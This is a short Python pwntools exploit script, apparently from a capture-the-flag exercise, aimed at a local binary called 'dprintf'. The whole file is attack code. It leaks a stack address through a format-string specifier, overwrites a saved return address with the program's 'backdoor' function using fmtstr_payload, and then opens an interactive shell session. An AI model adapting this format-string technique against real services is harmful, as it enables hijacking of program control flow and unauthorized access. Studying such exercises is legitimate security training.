program/input/dprintf.py

#!/usr/bin/env python3
# -*- coding:utf-8 -*-

from pwn import *
context.clear(arch='amd64', os='linux', log_level='info')

elf = ELF('./dprintf')
sh = remote('127.0.0.1', 11008)

sh.sendline(b'%39$p')
stack_addr = int(sh.recvline(), 16)
success('stack_addr: ' + hex(stack_addr))
sh.sendline(fmtstr_payload(7, {stack_addr - 0x48: p64(elf.sym['backdoor'])}))

sh.interactive()